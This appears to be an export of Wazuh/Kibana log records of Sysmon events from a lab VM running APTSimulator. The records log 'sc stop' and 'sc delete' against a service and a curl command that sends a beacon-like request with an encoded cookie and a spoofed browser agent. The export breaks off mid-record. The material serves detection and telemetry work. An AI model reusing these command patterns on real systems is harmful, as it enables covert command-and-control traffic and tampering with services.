tbbd05\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.611Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.611+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.611Z"
],
"timestamp": [
"2022-04-20T11:55:45.611Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745611
]
}
Service stopped
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "yF3URoABWZBNLY4mG7yu",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-af05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "7452",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.384",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc stop tbbd05",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.384\r\nProcessGuid: {c64152da-f4a4-625f-af05-000000000c00}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc stop tbbd05 \r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.3877656Z",
"eventRecordID": "5659",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3877656Z\",\"eventRecordID\":\"5659\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.384\\r\\nProcessGuid: {c64152da-f4a4-625f-af05-000000000c00}\\r\\nProcessId: 7452\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc stop tbbd05 \\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 
11:55:16.384\",\"processGuid\":\"{c64152da-f4a4-625f-af05-000000000c00}\",\"processId\":\"7452\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc stop tbbd05\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.616Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.616+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.616Z"
],
"timestamp": [
"2022-04-20T11:55:45.616Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745616
]
}
Service deleted.
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "yV3URoABWZBNLY4mG7yu",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-b005-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "2784",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.428",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc delete tbbd05",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.428\r\nProcessGuid: {c64152da-f4a4-625f-b005-000000000c00}\r\nProcessId: 2784\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc delete tbbd05 \r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.4304007Z",
"eventRecordID": "5660",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.4304007Z\",\"eventRecordID\":\"5660\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.428\\r\\nProcessGuid: {c64152da-f4a4-625f-b005-000000000c00}\\r\\nProcessId: 2784\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc delete tbbd05 \\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 
11:55:16.428\",\"processGuid\":\"{c64152da-f4a4-625f-b005-000000000c00}\",\"processId\":\"2784\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc delete tbbd05\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.639Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.639+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.639Z"
],
"timestamp": [
"2022-04-20T11:55:45.639Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745639
]
}
Network request 1
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "4l3URoABWZBNLY4mJ7xp",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a7-625f-b505-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "1476",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:19.566",
"hashes": "SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"commandLine": "\\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: */*\\\" -H \\\"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\\\" -A \\\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cache-Control: no-cache\\\" http://10.0.2.15/pixel.gif",
"integrityLevel": "High",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:19.566\r\nProcessGuid: {c64152da-f4a7-625f-b505-000000000c00}\r\nProcessId: 1476\r\nImage: C:\\Users\\vagrant\\simulator\\APTSimulator\\helpers\\curl.exe\r\nFileVersion: -\r\nDescription: -\r\nProduct: -\r\nCompany: -\r\nOriginalFileName: -\r\nCommandLine: \"C:\\Users\\vagrant\\simulator\\APTSimulator\\\\helpers\\curl.exe\" -s -o /dev/null -I -H \"Accept: */*\" -H \"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\" -A \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\" -H \"Connection: Keep-Alive\" -H \"Cache-Control: no-cache\" http://10.0.2.15/pixel.gif\r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:19.6088013Z",
"eventRecordID": "5673",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:19.6088013Z\",\"eventRecordID\":\"5673\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:19.566\\r\\nProcessGuid: {c64152da-f4a7-625f-b505-000000000c00}\\r\\nProcessId: 1476\\r\\nImage: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe\\r\\nFileVersion: -\\r\\nDescription: -\\r\\nProduct: -\\r\\nCompany: -\\r\\nOriginalFileName: -\\r\\nCommandLine: \\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: */*\\\" -H \\\"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\\\" -A \\\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cache-Control: no-cache\\\" http://10.0.2.15/pixel.gif\\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: 
C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 11:55:19.566\",\"processGuid\":\"{c64152da-f4a7-625f-b505-000000000c00}\",\"processId\":\"1476\",\"image\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\helpers\\\\\\\\curl.exe\",\"commandLine\":\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\\\\\\\\helpers\\\\\\\\curl.exe\\\\\\\" -s -o /dev/null -I -H \\\\\\\"Accept: */*\\\\\\\" -H \\\\\\\"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\\\\\\\" -A \\\\\\\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\\\\\\\" -H \\\\\\\"Connection: Keep-Alive\\\\\\\" -H \\\\\\\"Cache-Control: no-cache\\\\\\\" http://10.0.2.15/pixel.gif\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:47.753Z",
"location": "EventChannel",
"id": "1650455747.951847",
"timestamp": "2022-04-20T11:55:47.753+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:47.753Z"
],
"timestamp": [
"2022-04-20T11:55:47.753Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455747753
]
}
Network request 2
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "dF3gRoABWZBNLY4mRsPc",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f7c4-625f-fb05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "4656",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 12:08:36.397",
"hashes": "SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
